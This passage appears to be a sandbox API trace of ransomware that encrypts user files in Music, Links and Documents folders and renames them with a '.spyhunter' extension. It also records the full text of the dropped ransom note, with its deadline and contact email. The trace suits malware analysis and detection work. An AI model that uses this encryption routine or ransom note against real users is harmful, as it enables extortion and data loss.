lpNumberOfBytesWritten=0x25ced64*=0x2800, lpOverlapped=0x0) returned 1 [0148.201] GetProcessHeap () returned 0x2c0000 [0148.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.201] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.201] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceda4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced64, lpOverlapped=0x0 | out: lpBuffer=0x25ceda4*, lpNumberOfBytesWritten=0x25ced64*=0x4, lpOverlapped=0x0) returned 1 [0148.201] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced64, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced64*=0x30, lpOverlapped=0x0) returned 1 [0148.202] CloseHandle (hObject=0x9c) returned 1 [0148.202] GetProcessHeap () returned 0x2c0000 [0148.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0148.202] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6ZMYgDhyPmM.wav.spyhunter") returned 65 [0148.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6ZMYgDhyPmM.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6zmygdhypmm.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6ZMYgDhyPmM.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6zmygdhypmm.wav.spyhunter")) returned 1 [0148.202] GetProcessHeap () returned 0x2c0000 [0148.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0148.202] GetProcessHeap () returned 0x2c0000 [0148.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.203] GetProcessHeap () returned 0x2c0000 [0148.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2440 | out: hHeap=0x2c0000) returned 1 [0148.203] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceda0 | out: pbBuffer=0x25ceda0) returned 1 [0148.203] GetProcessHeap () returned 0x2c0000 [0148.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.203] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced98*=0x30) returned 1 [0148.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-Bw5V6uWrtTY-Qf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-bw5v6uwrtty-qf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.203] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-Bw5V6uWrtTY-Qf.m4a") returned 59 [0148.203] StrStrW (lpFirst="-Bw5V6uWrtTY-Qf.m4a", lpSrch=".txt") returned 0x0 [0148.203] GetProcessHeap () returned 0x2c0000 [0148.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.203] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced5c*=0x2800, lpOverlapped=0x0) returned 1 [0148.204] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.204] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced5c*=0x2800, lpOverlapped=0x0) returned 1 [0148.204] GetProcessHeap () returned 0x2c0000 [0148.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.204] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.205] WriteFile (in: hFile=0x9c, lpBuffer=0x25ced9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced5c, lpOverlapped=0x0 | out: lpBuffer=0x25ced9c*, lpNumberOfBytesWritten=0x25ced5c*=0x4, lpOverlapped=0x0) returned 1 [0148.205] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced5c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced5c*=0x30, lpOverlapped=0x0) returned 1 [0148.205] CloseHandle (hObject=0x9c) returned 1 [0148.205] GetProcessHeap () returned 0x2c0000 [0148.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0148.205] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-Bw5V6uWrtTY-Qf.m4a.spyhunter") returned 69 [0148.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-Bw5V6uWrtTY-Qf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-bw5v6uwrtty-qf.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-Bw5V6uWrtTY-Qf.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-bw5v6uwrtty-qf.m4a.spyhunter")) returned 1 [0148.206] GetProcessHeap () returned 0x2c0000 [0148.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0148.206] GetProcessHeap () returned 0x2c0000 [0148.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.206] GetProcessHeap () returned 0x2c0000 [0148.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d9f8 | out: hHeap=0x2c0000) returned 1 [0148.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceda0 | out: pbBuffer=0x25ceda0) returned 1 [0148.206] GetProcessHeap () returned 0x2c0000 [0148.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.206] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced98*=0x30) returned 1 [0148.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.206] GetProcessHeap () returned 0x2c0000 [0148.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.206] GetProcessHeap () returned 0x2c0000 [0148.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0ac28 | out: hHeap=0x2c0000) returned 1 [0148.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced98 | out: pbBuffer=0x25ced98) returned 1 [0148.207] GetProcessHeap () returned 0x2c0000 [0148.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.207] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced90*=0x30) returned 1 [0148.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.207] GetProcessHeap () returned 0x2c0000 [0148.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.207] GetProcessHeap () returned 0x2c0000 [0148.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0ab88 | out: hHeap=0x2c0000) returned 1 [0148.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.207] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0148.208] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceccb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cedf4, lpOverlapped=0x0 | out: lpBuffer=0x25ceccb*, lpNumberOfBytesWritten=0x25cedf4*=0x127, lpOverlapped=0x0) returned 1 [0148.208] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0148.208] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cedf4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cedf4*=0x2ac, lpOverlapped=0x0) returned 1 [0148.208] CloseHandle (hObject=0x9c) returned 1 [0148.209] GetProcessHeap () returned 0x2c0000 [0148.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d938 | out: hHeap=0x2c0000) returned 1 [0148.209] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced90 | out: pbBuffer=0x25ced90) returned 1 [0148.209] GetProcessHeap () returned 0x2c0000 [0148.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.209] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced88*=0x30) returned 1 [0148.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.827] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0148.827] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".txt") returned 0x0 [0148.827] GetProcessHeap () returned 0x2c0000 [0148.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.827] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced4c*=0x16b, lpOverlapped=0x0) returned 1 [0148.828] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.828] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x25ced4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced4c*=0x16b, lpOverlapped=0x0) returned 1 [0148.828] GetProcessHeap () returned 0x2c0000 [0148.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.828] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.828] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced4c, lpOverlapped=0x0 | out: lpBuffer=0x25ced8c*, lpNumberOfBytesWritten=0x25ced4c*=0x4, lpOverlapped=0x0) returned 1 [0148.828] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced4c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced4c*=0x30, lpOverlapped=0x0) returned 1 [0148.828] CloseHandle (hObject=0xa0) returned 1 [0148.828] GetProcessHeap () returned 0x2c0000 [0148.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.828] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.spyhunter") returned 66 [0148.828] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.spyhunter")) returned 1 [0148.829] GetProcessHeap () returned 0x2c0000 [0148.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.829] GetProcessHeap () returned 0x2c0000 [0148.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.829] GetProcessHeap () returned 0x2c0000 [0148.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2cf78 | out: hHeap=0x2c0000) returned 1 [0148.830] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced90 | out: pbBuffer=0x25ced90) returned 1 [0148.830] GetProcessHeap () returned 0x2c0000 [0148.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.830] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced88*=0x30) returned 1 [0148.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\dWOB7nle4zEFsq.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\dwob7nle4zefsq.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\dWOB7nle4zEFsq.ppt") returned 83 [0148.830] StrStrW (lpFirst="dWOB7nle4zEFsq.ppt", lpSrch=".txt") returned 0x0 [0148.830] GetProcessHeap () returned 0x2c0000 [0148.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.830] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced4c*=0x2800, lpOverlapped=0x0) returned 1 [0148.831] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.831] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced4c*=0x2800, lpOverlapped=0x0) returned 1 [0148.831] GetProcessHeap () returned 0x2c0000 [0148.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.831] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.831] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced4c, lpOverlapped=0x0 | out: lpBuffer=0x25ced8c*, lpNumberOfBytesWritten=0x25ced4c*=0x4, lpOverlapped=0x0) returned 1 [0148.831] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced4c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced4c*=0x30, lpOverlapped=0x0) returned 1 [0148.831] CloseHandle (hObject=0xa0) returned 1 [0148.832] GetProcessHeap () returned 0x2c0000 [0148.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.832] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\dWOB7nle4zEFsq.ppt.spyhunter") returned 93 [0148.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\dWOB7nle4zEFsq.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\dwob7nle4zefsq.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\dWOB7nle4zEFsq.ppt.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\dwob7nle4zefsq.ppt.spyhunter")) returned 1 [0148.832] GetProcessHeap () returned 0x2c0000 [0148.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.832] GetProcessHeap () returned 0x2c0000 [0148.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.832] GetProcessHeap () returned 0x2c0000 [0148.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63a98 | out: hHeap=0x2c0000) returned 1 [0148.833] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced88 | out: pbBuffer=0x25ced88) returned 1 [0148.833] GetProcessHeap () returned 0x2c0000 [0148.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.833] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced80*=0x30) returned 1 [0148.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\C-Vy.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\c-vy.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.833] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\C-Vy.doc") returned 73 [0148.833] StrStrW (lpFirst="C-Vy.doc", lpSrch=".txt") returned 0x0 [0148.833] GetProcessHeap () returned 0x2c0000 [0148.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.833] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced44*=0x2800, lpOverlapped=0x0) returned 1 [0148.834] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.834] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced44*=0x2800, lpOverlapped=0x0) returned 1 [0148.834] GetProcessHeap () returned 0x2c0000 [0148.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.834] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.834] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced44, lpOverlapped=0x0 | out: lpBuffer=0x25ced84*, lpNumberOfBytesWritten=0x25ced44*=0x4, lpOverlapped=0x0) returned 1 [0148.834] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced44, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced44*=0x30, lpOverlapped=0x0) returned 1 [0148.835] CloseHandle (hObject=0xa0) returned 1 [0148.835] GetProcessHeap () returned 0x2c0000 [0148.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.835] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\C-Vy.doc.spyhunter") returned 83 [0148.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\C-Vy.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\c-vy.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\C-Vy.doc.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\c-vy.doc.spyhunter")) returned 1 [0148.835] GetProcessHeap () returned 0x2c0000 [0148.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.835] GetProcessHeap () returned 0x2c0000 [0148.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.836] GetProcessHeap () returned 0x2c0000 [0148.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5498 | out: hHeap=0x2c0000) returned 1 [0148.836] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced88 | out: pbBuffer=0x25ced88) returned 1 [0148.836] GetProcessHeap () returned 0x2c0000 [0148.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.836] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced80*=0x30) returned 1 [0148.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\b2f20.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\b2f20.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\b2f20.ppt") returned 74 [0148.836] StrStrW (lpFirst="b2f20.ppt", lpSrch=".txt") returned 0x0 [0148.836] GetProcessHeap () returned 0x2c0000 [0148.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.836] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced44*=0x2800, lpOverlapped=0x0) returned 1 [0148.838] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.838] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, 